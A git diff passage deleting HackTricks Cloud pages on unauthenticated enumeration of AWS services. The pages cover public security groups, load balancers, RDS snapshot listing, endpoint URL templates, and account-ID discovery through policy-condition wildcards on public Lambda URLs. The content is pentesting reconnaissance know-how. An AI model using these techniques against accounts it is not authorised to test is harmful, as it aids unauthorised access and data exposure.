-The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry.
-
-```bash
-# Get image names
-skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+'
-crane ls | sed 's/ .*//'
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
deleted file mode 100644
index 1f9e1b97b..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
+++ /dev/null
@@ -1,53 +0,0 @@
-# AWS - ECS Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## ECS
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-ecs-enum.md" %}
-[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md)
-{% endcontent-ref %}
-
-### Publicly Accessible Security Group or Load Balancer for ECS Services
-
-A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks.
-
-{% code overflow="wrap" %}
-```bash
-# Example of detecting misconfigured security group for ECS services
-aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]'
-
-# Example of detecting a publicly accessible load balancer for ECS services
-aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]'
-```
-{% endcode %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
deleted file mode 100644
index 8ea519bad..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# AWS - Elastic Beanstalk Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Elastic Beanstalk
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %}
-[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md)
-{% endcontent-ref %}
-
-### Web vulnerability
-
-Note that by default Beanstalk environments have the **Metadatav1 disabled**.
-
-The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`**
-
-### Insecure Security Group Rules
-
-Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**.
-
-### Publicly Accessible Load Balancer
-
-If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments.
-
-### Publicly Accessible S3 Buckets
-
-Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**.
-
-### Enumerate Public Environments
-
-{% code overflow="wrap" %}
-```bash
-aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table
-```
-{% endcode %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
deleted file mode 100644
index 0e6f5efc9..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
+++ /dev/null
@@ -1,38 +0,0 @@
-# AWS - Elasticsearch Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### Public URL template
-
-```
-https://vpc-{user_provided}-[random].[region].es.amazonaws.com
-https://search-{user_provided}-[random].[region].es.amazonaws.com
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
deleted file mode 100644
index 6cb420ff7..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md
+++ /dev/null
@@ -1,39 +0,0 @@
-# AWS - IoT Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### Public URL template
-
-```
-mqtt://{random_id}.iot.{region}.amazonaws.com:8883
-https://{random_id}.iot.{region}.amazonaws.com:8443
-https://{random_id}.iot.{region}.amazonaws.com:443
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
deleted file mode 100644
index 0ea3e2d46..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# AWS - Kinesis Video Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### Public URL template
-
-```
-https://{random_id}.kinesisvideo.{region}.amazonaws.com
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
deleted file mode 100644
index aac576119..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
+++ /dev/null
@@ -1,48 +0,0 @@
-# AWS - Lambda Unauthenticated Access
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Public Function URL
-
-It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities.
-
-### Public URL template
-
-```
-https://{random_id}.lambda-url.{region}.on.aws/
-```
-
-### Get Account ID from public Lambda URL
-
-Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
-This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
-
-You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
deleted file mode 100644
index 1d1e83f04..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
+++ /dev/null
@@ -1,39 +0,0 @@
-# AWS - Media Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### Public URL template
-
-```
-https://{random_id}.mediaconvert.{region}.amazonaws.com
-https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
-https://{random_id}.data.mediastore.{region}.amazonaws.com
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
deleted file mode 100644
index 1c748c6d4..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
+++ /dev/null
@@ -1,48 +0,0 @@
-# AWS - MQ Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Port - -### **RabbitMQ** - -In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` - -### ActiveMQ - -In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. - -### Public URL template - -``` -https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ -ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md deleted file mode 100644 index 0de37352c..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - MSK Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-### Public Port
-
-It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured).
-
-It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet.
-
-### Public URL template
-
-```
-b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
-{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md deleted file mode 100644 index fa2b1ba73..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - RDS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## RDS - -For more information check: - -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} - -## Public Port - -It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. - -## Public RDS Snapshots - -AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account: - -```bash -# Public RDS snapshots -aws rds describe-db-snapshots --include-public - -## Search by account ID -aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]' -## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted) -## To share a RDS encrypted snapshot you need to share the KMS key also with the account - - -# From the own account you can check if there is any public snapshot with: -aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] -## Even if in the console appear as there are public snapshot it might be public -## snapshots from other accounts used by the current account -``` - -### Public URL template - -``` -mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 -postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md deleted file mode 100644 index a6e2a448a..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Redshift Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-### Public URL template
-
-```
-{user_provided}...redshift.amazonaws.com
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
